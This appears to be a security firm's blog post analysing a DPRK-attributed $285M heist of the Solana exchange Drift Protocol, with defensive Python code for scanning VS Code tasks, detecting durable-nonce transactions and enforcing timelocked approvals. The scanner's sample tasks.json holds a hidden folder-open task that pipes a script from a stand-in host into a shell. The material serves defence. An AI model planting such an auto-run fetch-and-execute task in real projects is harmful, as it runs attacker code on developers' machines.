On April 1, 2026, the largest hack of the year executed flawlessly. In twelve minutes, 31 coordinated transactions drained $285 million in USDC and JLP from Drift Protocol — the largest decentralized perpetual futures exchange on Solana. The attackers had been inside for six months.
Attribution to UNC4736, a North Korean state-sponsored financial theft group, came within 48 hours. This is the same unit that breached 3CX in 2023 via a supply chain attack on a trading application and stole $53M from Radiant Capital in October 2024. Their sophistication has not plateaued.
What makes this incident worth your attention — even if you have no exposure to DeFi or Solana — is the toolkit. The techniques used in this attack are not crypto-specific. The IDE supply chain vector, the long-con social engineering playbook, and the pre-signed authorization abuse all translate directly to enterprise environments. If your engineering team opens repositories from external contributors, your organization is in the same threat model.
The Six-Month Attack Timeline
This was not an opportunistic exploit. It was a patient, multi-phase operation that required sustained presence, parallel infrastructure construction, and precise timing across multiple attack vectors simultaneously.
(Timeline graphic; only its final entries survived extraction.) The weaponized tasks.json silently executes a payload on folder open. Sustained Telegram communication with contributors continues throughout this period, with "detailed product questions" used to maintain access and trust.
The Five Attack Vectors and Their Enterprise Equivalents
What makes this attack exceptional is the layered redundancy. Any single defensive control stopping one vector would not have prevented the breach — the attackers had multiple independent paths to the same outcome.
1. IDE Supply Chain: The VSCode tasks.json Technique
This is the vector that should concern every engineering organization immediately. The attackers shared a malicious VSCode project with Drift contributors. Inside that project was a weaponized .vscode/tasks.json whose task carried "runOptions": {"runOn": "folderOpen"}, the option VS Code provides for tasks that should start automatically when the folder is opened.
The moment a developer opens the repository in VSCode or Cursor and trusts the folder, the task executes. In VS Code the only gate is the Workspace Trust prompt, which most developers click through reflexively; after that there is no further interaction, no obvious sign, and in older versions no security warning. The same technique is the backbone of DPRK's "Contagious Interview" campaign, running since 2023, in which operatives pose as technical recruiters and ask candidates to clone and "review" a repository as part of a job interview.
The enterprise risk: Your developers open external repositories regularly — open source contributions, vendor integrations, interview take-home projects, freelancer code reviews. Any of these can carry this payload. It does not require the attacker to compromise a package registry or an upstream dependency. They just need to get someone to open the project folder.
Microsoft patched the unattended task execution behavior in VSCode 1.109 and 1.110. If your organization is running older versions — or if developers are using Cursor, which had the same vulnerability — this attack vector remains open.
Check the installed version with code --version in a terminal. If it is below 1.109, update immediately, and audit every developer machine on the team. The fix specifically addresses the automatic execution of tasks on folder open without user confirmation, a behavior that should never have existed as a default.
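A scanner for exactly this pattern, added here as an example and not taken from the Drift write-up or any vendor tool. It parses each .vscode/tasks.json under a checkout (tasks.json is JSONC, so comments and trailing commas have to be stripped first), reports every task with runOptions.runOn set to folderOpen, and shows the command it would run. The tasks.json it scans is a constructed sample written into a temporary directory.

```python
"""Find VS Code tasks that fire on folder open.

Added example for this write-up, not code from Drift or from any vendor. It
walks a checkout, cleans each .vscode/tasks.json (the file is JSONC, so
comments and trailing commas are legal) and reports every task whose
runOptions.runOn is "folderOpen", together with the command it would run.
The sample tasks.json below is constructed for the demo.
"""
import json
import os
import re
import tempfile


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside strings, then trailing commas."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j < 0 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing commas before } or ] (a string containing ",]" would be touched
    # too; acceptable for a scanner, not for a general-purpose parser).
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def auto_tasks(tasks_json: str) -> list[dict]:
    """Return the tasks VS Code launches automatically once the folder is trusted."""
    doc = json.loads(strip_jsonc(tasks_json))
    hits = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        argv = [str(task.get("command", ""))] + [str(a) for a in task.get("args") or []]
        hits.append({"label": task.get("label", "<unlabeled>"),
                     "type": task.get("type", "shell"),
                     "command": " ".join(argv).strip(),
                     "hidden": (task.get("presentation") or {}).get("reveal") == "never"})
    return hits


def scan_tree(root: str) -> dict[str, list[dict]]:
    """Collect auto-run tasks from every .vscode/tasks.json under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in files:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8") as fh:
                try:
                    hits = auto_tasks(fh.read())
                except (ValueError, AttributeError):   # unparseable: still worth a look
                    hits = [{"label": "<unparseable>", "type": "?", "command": "?", "hidden": False}]
            if hits:
                findings[path] = hits
    return findings


# Constructed sample: one ordinary build task and one that fires on folder open.
SAMPLE_TASKS_JSON = r'''{
  // build helper plus a "prepare env" step that runs on open
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {
      "label": "prepare env",
      "type": "shell",
      "command": "sh",
      "args": ["-c", "curl -s https://example.invalid/setup.sh | sh"],
      "runOptions": {"runOn": "folderOpen"},
      "presentation": {"reveal": "never", "echo": false}, /* keep the terminal hidden */
    },
  ]
}'''


def demo() -> dict[str, list[dict]]:
    """Write the sample into a temporary checkout and scan it."""
    with tempfile.TemporaryDirectory() as root:
        vscode = os.path.join(root, "repo", ".vscode")
        os.makedirs(vscode)
        with open(os.path.join(vscode, "tasks.json"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_TASKS_JSON)
        return {os.path.relpath(p, root): h for p, h in scan_tree(root).items()}


if __name__ == "__main__":
    for path, hits in demo().items():
        for h in hits:
            flag = " (terminal hidden)" if h["hidden"] else ""
            print(f"{path}: '{h['label']}' runs on folderOpen{flag}: {h['command']}")
```

Run it from a terminal before the folder is opened in the IDE and treat any hit as hostile until proven otherwise. It is a triage aid, not a substitute for Restricted Mode: tasks can also be declared in a .code-workspace file, which this example does not read.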
2. TestFlight Supply Chain: The Trojanized Mobile App
A second contributor was compromised via a wallet application distributed through Apple's TestFlight beta testing platform. The app was either directly trojanized or replaced a legitimate app in the contributor's trust chain. This vector is harder to defend against: TestFlight builds do not go through full App Store review (internal-tester builds get no review at all, external-tester builds only a lighter beta review), and malicious applications in beta distribution are a known but underappreciated risk.
The enterprise risk: Engineering teams that use mobile applications for internal tools, MFA, or production access — especially beta-distributed applications — carry this exposure. This includes hardware wallet companion apps, internal ops tools, and infrastructure management apps distributed via MDM or beta testing programs.
3. Durable Nonce Pre-Signing: The Pre-Authorized Credential Trap
This is the financial mechanism of the heist, and it has a clear enterprise analogue. A Solana transaction normally references a recent blockhash, and the network rejects it once that blockhash is older than about 150 blocks (roughly a minute to a minute and a half). A durable nonce replaces the blockhash with a value stored in an on-chain nonce account; the transaction stays valid until that nonce is advanced, which happens only when the transaction itself (or another one against the same nonce) lands. In practice a signed transaction can sit in a drawer for weeks. The tell is structural: a durable-nonce transaction's first instruction must be the System Program's AdvanceNonceAccount.
Attackers socially engineered members of Drift's Security Council — the 2-of-5 multisig body responsible for governance — into pre-signing what appeared to be routine governance transactions. These were actually durable nonce transactions. Weeks later, the attackers submitted those pre-signed authorizations in a completely different operational context, bypassing the multisig protection entirely.
The enterprise equivalent: Pre-approved change tickets, long-lived OAuth tokens, persistent API keys scoped to privileged operations, and "break glass" credentials that exist in a pre-authorized state waiting to be used. Social engineering an approver into pre-approving a change request is exactly the same attack pattern — just in a different domain. The 2-of-5 threshold also highlights a critical governance misconfiguration: a threshold that low, on a treasury controlling hundreds of millions, should have been 3-of-5 at minimum.
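To make the tell concrete, here is an added example (mine, not Drift's or Solana Labs' code) that parses a legacy Solana message from its raw bytes and reports whether its first instruction is the System Program's AdvanceNonceAccount. The small serializer alongside it exists only so the demo can build two constructed transactions offline, one ordinary transfer and one durable-nonce transfer; the account keys are stand-in byte strings, not real addresses.

```python
"""Flag Solana transactions that use a durable nonce before you sign them.

Added example (not Drift's or Solana Labs' code). A durable-nonce transaction
is recognisable from its bytes alone: its first instruction must be the
System Program's AdvanceNonceAccount, and the 'recent blockhash' slot then
holds the stored nonce rather than a fresh hash. The minimal legacy-message
serializer below exists only so the demo can construct sample transactions
offline; the keys it uses are stand-ins, not real Solana addresses.
"""
SYSTEM_PROGRAM = bytes(32)                          # 11111111111111111111111111111111
ADVANCE_NONCE_ACCOUNT = (4).to_bytes(4, "little")   # SystemInstruction index 4, no args
TRANSFER = (2).to_bytes(4, "little")                # SystemInstruction index 2 + u64 lamports


def _encode_compact_u16(n: int) -> bytes:
    """Solana's compact-u16: 7 bits per byte, high bit marks continuation."""
    out = bytearray()
    while True:
        low, n = n & 0x7F, n >> 7
        out.append(low | 0x80 if n else low)
        if not n:
            return bytes(out)


def _decode_compact_u16(buf: bytes, pos: int) -> tuple[int, int]:
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def build_message(header: bytes, keys: list, blockhash: bytes, instructions: list) -> bytes:
    """Serialize a legacy message; instructions are (program_index, [account indexes], data)."""
    out = bytearray(header)
    out += _encode_compact_u16(len(keys))
    for k in keys:
        out += k
    out += blockhash
    out += _encode_compact_u16(len(instructions))
    for prog, accts, data in instructions:
        out.append(prog)
        out += _encode_compact_u16(len(accts)) + bytes(accts)
        out += _encode_compact_u16(len(data)) + data
    return bytes(out)


def parse_message(buf: bytes) -> dict:
    """Parse a legacy message: 3-byte header, account keys, blockhash, instructions."""
    header, pos = tuple(buf[:3]), 3
    n_keys, pos = _decode_compact_u16(buf, pos)
    keys = [buf[pos + 32 * i: pos + 32 * (i + 1)] for i in range(n_keys)]
    pos += 32 * n_keys
    blockhash, pos = buf[pos:pos + 32], pos + 32
    n_ix, pos = _decode_compact_u16(buf, pos)
    instructions = []
    for _ in range(n_ix):
        prog, pos = buf[pos], pos + 1
        n_acc, pos = _decode_compact_u16(buf, pos)
        accts, pos = list(buf[pos:pos + n_acc]), pos + n_acc
        n_data, pos = _decode_compact_u16(buf, pos)
        data, pos = buf[pos:pos + n_data], pos + n_data
        instructions.append((prog, accts, data))
    return {"header": header, "keys": keys, "blockhash": blockhash, "instructions": instructions}


def durable_nonce_info(msg: dict):
    """Return the nonce account key if the message uses a durable nonce, else None."""
    if not msg["instructions"]:
        return None
    prog, accts, data = msg["instructions"][0]
    if msg["keys"][prog] == SYSTEM_PROGRAM and data == ADVANCE_NONCE_ACCOUNT and accts:
        return msg["keys"][accts[0]]      # accounts: nonce account, sysvar, nonce authority
    return None


# Constructed demo inputs: stand-in 32-byte keys, not real addresses.
SIGNER, NONCE_ACCOUNT, RECIPIENT = bytes([1]) * 32, bytes([3]) * 32, bytes([2]) * 32
RECENT_BLOCKHASHES_SYSVAR = bytes([4]) * 32   # stand-in for the recent-blockhashes sysvar
KEYS = [SIGNER, NONCE_ACCOUNT, RECIPIENT, RECENT_BLOCKHASHES_SYSVAR, SYSTEM_PROGRAM]
HEADER = bytes([1, 0, 2])   # 1 signer, 0 read-only signed, 2 read-only unsigned (sysvar, program)
TRANSFER_IX = (4, [0, 2], TRANSFER + (1_000_000).to_bytes(8, "little"))
ADVANCE_IX = (4, [1, 3, 0], ADVANCE_NONCE_ACCOUNT)


def plain_transaction() -> bytes:
    return build_message(HEADER, KEYS, bytes([0xAB]) * 32, [TRANSFER_IX])


def durable_nonce_transaction() -> bytes:
    return build_message(HEADER, KEYS, bytes([0xCD]) * 32, [ADVANCE_IX, TRANSFER_IX])


if __name__ == "__main__":
    for name, raw in (("plain", plain_transaction()), ("nonce", durable_nonce_transaction())):
        nonce_acct = durable_nonce_info(parse_message(raw))
        verdict = f"DURABLE NONCE via account {nonce_acct.hex()[:8]}..." if nonce_acct else "expires with blockhash"
        print(f"{name}: {verdict}")
```

A signer asked to approve a "routine" transaction can run the message bytes through durable_nonce_info before signing; a non-None result means the signature stays usable until the nonce is advanced, whatever the displayed intent. The parser handles legacy messages only: versioned (v0) messages carry a version prefix and address lookup tables that it does not read.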
4. Oracle Manipulation: Manufacturing Trusted Data
The CarbonVote Token (CVT) operation is a textbook data integrity attack. Attackers minted 750 million CVT units, seeded minimal real liquidity, and used wash trading to manufacture a consistent ~$1 price signal over several weeks. Drift's price oracle — trusting the on-chain price data — treated CVT as legitimate collateral worth hundreds of millions of dollars.
The enterprise equivalent: Any system that trusts an external data feed without independent verification is exposed to the same pattern: a SIEM whose rules key off a threat intelligence feed, a detection pipeline that trusts a log aggregator an attacker can write to, or a configuration management system that pulls from a source an attacker has compromised. The attacker does not need to compromise the system directly; corrupting the data the system trusts is enough.
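The collateral check below is an added example, not Drift's oracle or risk engine, to show the cheapest defence against a manufactured price: value collateral by what the bid side of the book would actually pay for the whole position, and require independent sources to agree before trusting the reference price at all. Order-book levels, prices and position sizes are constructed; the CVT-like case has a consistent one-dollar print and almost no depth behind it.

```python
"""Liquidity-aware collateral valuation.

Added example, not Drift's oracle or risk code. A price signal is only worth
what the market would actually pay for the position behind it, so two checks
run before an oracle price is trusted for collateral:
  1. independent price sources must agree (a wash-traded pool and a feed that
     copies it are not independent; the caller decides what counts),
  2. the whole position must be sellable into visible bid depth at close to
     the quoted price, otherwise the value is cut to what the bids would pay.
All numbers below are constructed for the demo.
"""
from statistics import median


def liquidation_proceeds(bids, amount):
    """Sell `amount` into bids [(price, size), ...], best price first.
    Returns (proceeds, filled); filled < amount means the book ran out."""
    proceeds = filled = 0.0
    for price, size in sorted(bids, key=lambda lvl: lvl[0], reverse=True):
        take = min(size, amount - filled)
        proceeds += take * price
        filled += take
        if filled >= amount:
            break
    return proceeds, filled


def collateral_value(amount, source_prices, bids, max_spread=0.02, min_realizable=0.95):
    """Return (accepted_value, reason) for a position of `amount` units."""
    ref = median(source_prices)
    spread = (max(source_prices) - min(source_prices)) / ref
    if spread > max_spread:
        return 0.0, f"rejected: price sources disagree by {spread:.1%}"
    proceeds, filled = liquidation_proceeds(bids, amount)
    realizable = proceeds / (amount * ref)
    if filled < amount or realizable < min_realizable:
        return proceeds, (f"haircut: only {realizable:.1%} of oracle value "
                          f"({amount * ref:,.0f}) is realizable against visible bids")
    return amount * ref, "ok"


# Constructed scenarios.
CVT_LIKE = dict(amount=300_000_000,
                source_prices=[1.00, 1.01, 1.00],     # every venue echoes the wash-traded pool
                bids=[(0.99, 20_000), (0.95, 30_000), (0.50, 100_000)])
DEEP_STABLE = dict(amount=1_000_000,
                   source_prices=[1.0, 1.0, 0.9995],
                   bids=[(0.9998, 3_000_000)])
DIVERGENT = dict(amount=50_000, source_prices=[1.0, 0.6], bids=[(0.98, 200_000)])


def demo():
    """Evaluate each scenario; returns {name: (value, reason)}."""
    return {name: collateral_value(**params)
            for name, params in (("CVT", CVT_LIKE), ("stable", DEEP_STABLE), ("divergent", DIVERGENT))}


if __name__ == "__main__":
    for name, (value, reason) in demo().items():
        print(f"{name:>9}: accepted value {value:,.0f} ({reason})")
```

The CVT-like position prints at a nominal $300M and is accepted for about $98k, which is all the visible bids would pay; the deep stablecoin position is accepted at face value. Depth snapshots can be faked too, so a production check also looks at who is on the other side of the volume, but a haircut to observable depth alone would have capped the damage here.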
5. Governance Destruction: Eliminating the Last Defense
The March 27 zero-timelock Security Council migration was not part of the financial theft itself; it was a preparatory step to eliminate the protocol's last line of defense. Drift's governance model originally included time delays on major parameter changes, giving the community time to detect and block malicious upgrades. By migrating the Security Council with a zero timelock, the attackers removed this safeguard five days before the final execution.
The enterprise equivalent: This mirrors the pattern of privilege escalation followed by defense removal that pentesters find in enterprise environments constantly. Compromised service accounts are used to modify SIEM alert thresholds, disable DLP policies, or approve changes that reduce detection coverage — all in preparation for the final payload. The most dangerous attacks are not ones that try to evade defenses. They are ones that successfully remove defenses before executing.
Understanding the DPRK Long-Con Playbook
UNC4736, also tracked as AppleJeus, Citrine Sleet, and Golden Chollima, is one of the most financially focused threat actors in the world. Unlike most nation-state groups whose primary objectives are espionage and data theft, DPRK's cyber operations have a direct revenue function — funding the North Korean state. Estimates put DPRK's cumulative crypto theft at over $3 billion since 2017.
State sponsor: Democratic People's Republic of Korea (DPRK), Reconnaissance General Bureau
Primary objective: Financial theft to fund the DPRK state
Notable prior operations: 3CX supply chain breach (2023), Radiant Capital hack — $53M (Oct 2024), multiple exchange compromises totaling $3B+ since 2017
Signature TTPs: Contagious Interview (developer supply chain), fake trading firm personas, watering hole attacks on crypto communities, IDE and package manager supply chain abuse
The six-month timeline in the Drift attack is not unusual for DPRK operations. They are willing to invest months of sustained access — conference attendance, Telegram conversations, product testing, real capital deployment — to build the trust and operational position needed for a single high-value extraction. This patience is the defining characteristic that separates their operations from opportunistic criminal groups.
The use of non-North Korean intermediaries at the initial approach phase is also a consistent technique. It bypasses the geographic and behavioral anomaly detection that might flag a direct approach from a DPRK-associated identity. The real operatives enter later, after the relationship is already established.
What Your Engineering Team Needs to Do This Week
The Drift hack is a case study, not just a news story. If you run an engineering team that handles production infrastructure, customer data, or privileged access systems, these are not hypothetical risks.
1. Update VSCode and Cursor on every developer machine today. Version 1.109+ patches the automatic task execution on folder open. This is code execution on the developer's machine with no interaction beyond opening and trusting the folder. It is not hypothetical: it was used in this attack, and it has been used in Contagious Interview operations against hundreds of developers since 2023.
2. Audit how your team handles external repositories. Do developers clone repos from vendors, contractors, open source projects, or interview candidates? Establish a policy: external repositories are opened in an isolated environment (container, VM, or at minimum a clean directory opened in VS Code's Restricted Mode, with Workspace Trust left on and the folder not trusted) before any review.
3. Review your long-lived credential posture. Inventory all OAuth tokens, API keys, and pre-approved authorizations that remain valid indefinitely. DPRK's durable nonce technique applies to any credential or approval that can be exercised at an arbitrary future time. Long-lived credentials should have documented justification, rotation schedules, and scope limits.
4. Audit your change approval thresholds. If your infrastructure changes require N-of-M approvals, review what N and M are, and whether social engineering 2 out of 5 approvers is a realistic attack surface. For high-impact changes (infrastructure modifications, IAM policy changes, security control modifications), consider raising thresholds and adding time delays before execution.
5. Brief your technical team on Contagious Interview. DPRK specifically targets developers. The fake recruiter persona, the "technical assessment" repository, the "trading firm" partnership offer: these are documented approaches. Your senior engineers are the targets. They need to know what the social engineering lure looks like before they encounter it.
6. Treat developer tooling as part of your attack surface. Your security team reviews your application's attack surface. Does it review your developers' development environment? IDE extensions, global npm packages, dotfiles, and shell configurations loaded in every terminal session are all code execution opportunities. DPRK found the VSCode config file more valuable than any web application vulnerability.
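Items 3 and 4, together with the zero-timelock section above, describe one control: an approval that is bound to a specific change, expires, counts each approver once, needs N distinct approvers, and cannot execute before a delay. The evaluator below is an added example of that control written for this page, not a vendor product; approver keys, timestamps and change records are constructed, and HMAC stands in for the hardware-backed signature a real deployment would use.

```python
"""Change-approval policy that refuses the durable-nonce trick in enterprise form.

Added example, not any vendor's product. Each approval is bound to the exact
change (its digest), carries an expiry, and is signed by one approver; the
evaluator needs N distinct valid approvers and then enforces a timelock before
execution. Approver keys, timestamps and change records are constructed for
the demo; HMAC stands in for hardware-backed signatures.
"""
import hashlib
import hmac
import json
from dataclasses import dataclass

# Constructed per-approver keys (a real deployment would use hardware-backed keys).
APPROVER_KEYS = {name: hashlib.sha256(f"demo-key-{name}".encode()).digest()
                 for name in ("alice", "bob", "carol", "dave", "erin")}


def change_digest(change: dict) -> str:
    """Canonical hash of the complete change request, target environment included."""
    return hashlib.sha256(json.dumps(change, sort_keys=True).encode()).hexdigest()


@dataclass(frozen=True)
class Approval:
    approver: str
    digest: str
    issued_at: int   # unix seconds
    ttl: int         # seconds the approval stays valid
    mac: str


def _approval_bytes(approver: str, digest: str, issued_at: int, ttl: int) -> bytes:
    return f"{approver}|{digest}|{issued_at}|{ttl}".encode()


def sign_approval(approver: str, change: dict, issued_at: int, ttl: int = 7 * 86400) -> Approval:
    digest = change_digest(change)
    mac = hmac.new(APPROVER_KEYS[approver], _approval_bytes(approver, digest, issued_at, ttl),
                   hashlib.sha256).hexdigest()
    return Approval(approver, digest, issued_at, ttl, mac)


@dataclass(frozen=True)
class Policy:
    approvers: frozenset
    threshold: int
    timelock: int    # seconds between reaching quorum and permitted execution


def evaluate(change: dict, approvals: list, policy: Policy, now: int):
    """Return (allowed, reasons). Invalid approvals are reported, not silently dropped."""
    digest = change_digest(change)
    valid, reasons = {}, []
    for a in approvals:
        if a.approver not in policy.approvers:
            reasons.append(f"{a.approver}: not an approver")
            continue
        expected = hmac.new(APPROVER_KEYS[a.approver],
                            _approval_bytes(a.approver, a.digest, a.issued_at, a.ttl),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(a.mac, expected):
            reasons.append(f"{a.approver}: bad signature")
            continue
        if a.digest != digest:
            reasons.append(f"{a.approver}: approval is for a different change")
            continue
        if now > a.issued_at + a.ttl:
            reasons.append(f"{a.approver}: approval expired")
            continue
        valid[a.approver] = a        # a second approval from the same person adds no vote
    if len(valid) < policy.threshold:
        reasons.append(f"{len(valid)} of {policy.threshold} required approvals")
        return False, reasons
    quorum_at = sorted(a.issued_at for a in valid.values())[policy.threshold - 1]
    if now < quorum_at + policy.timelock:
        reasons.append(f"timelock: executable from {quorum_at + policy.timelock}")
        return False, reasons
    return True, reasons


# Constructed scenarios: a 3-of-5 council with a 24h timelock.
COUNCIL = Policy(frozenset(APPROVER_KEYS), threshold=3, timelock=24 * 3600)
T0 = 1_700_000_000
ROUTINE = {"action": "update_fee_param", "target": "prod", "value": 0.02}
DRAIN = {"action": "transfer_treasury", "target": "prod", "to": "attacker"}


def scenarios() -> dict:
    good = [sign_approval(n, ROUTINE, T0 + i * 60) for i, n in enumerate(("alice", "bob", "carol"))]
    stale = [sign_approval(n, ROUTINE, T0 - 21 * 86400) for n in ("alice", "bob", "carol")]
    forged = Approval("dave", change_digest(ROUTINE), T0, 7 * 86400, "00" * 32)
    return {
        "quorum_but_timelock": evaluate(ROUTINE, good, COUNCIL, T0 + 600),
        "after_timelock": evaluate(ROUTINE, good, COUNCIL, T0 + 120 + 24 * 3600 + 1),
        "replayed_for_drain": evaluate(DRAIN, good, COUNCIL, T0 + 2 * 86400),
        "three_week_old": evaluate(ROUTINE, stale, COUNCIL, T0),
        "same_approver_twice": evaluate(ROUTINE, [good[0], good[0], good[1]], COUNCIL, T0 + 2 * 86400),
        "forged_signature": evaluate(ROUTINE, [forged, good[0], good[1]], COUNCIL, T0 + 2 * 86400),
    }


if __name__ == "__main__":
    for name, (allowed, reasons) in scenarios().items():
        print(f"{name:>20}: {'ALLOW' if allowed else 'DENY '} {'; '.join(reasons)}")
```

The approval TTL must be longer than the timelock or nothing ever executes; the demo uses seven days against a 24-hour delay. The "replayed_for_drain" case is the durable-nonce pattern: three genuine signatures on a routine change are worthless against a different change because the digest covers the whole request.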
The Bigger Picture: DPRK Is Not Slowing Down
The Drift Protocol hack represents a continued evolution of DPRK's operational capability. Each major operation adds sophistication: the 3CX breach introduced supply chain compromise of a legitimate business application. The Radiant Capital hack refined the social engineering of multisig keyholders. The Drift operation combined developer tooling supply chain, governance manipulation, fake financial infrastructure, and pre-signed authorization abuse into a single coordinated campaign.
United Nations Security Council reporting and blockchain analytics firms put DPRK's cryptocurrency theft in 2024 alone at well over $1 billion. The revenue model works. The operational tempo is increasing. And the target list is expanding: DPRK is not exclusively targeting crypto. Their Contagious Interview campaign has been observed targeting developers at fintech companies, defense contractors, and enterprise software firms.
The $285M from Drift will fund North Korea's weapons program. The techniques they used to get it will be used again — possibly against a traditional enterprise, a startup with a valuable acquisition target, or a developer at your company who receives a LinkedIn message from a convincing recruiter offering a compelling technical challenge.
Is Your Engineering Team in DPRK's Target Profile?
If your developers handle production infrastructure, privileged access systems, or customer data — they are potential Contagious Interview targets. Our security assessments cover developer tooling exposure, supply chain attack surface, and the social engineering controls that nation-state actors probe first.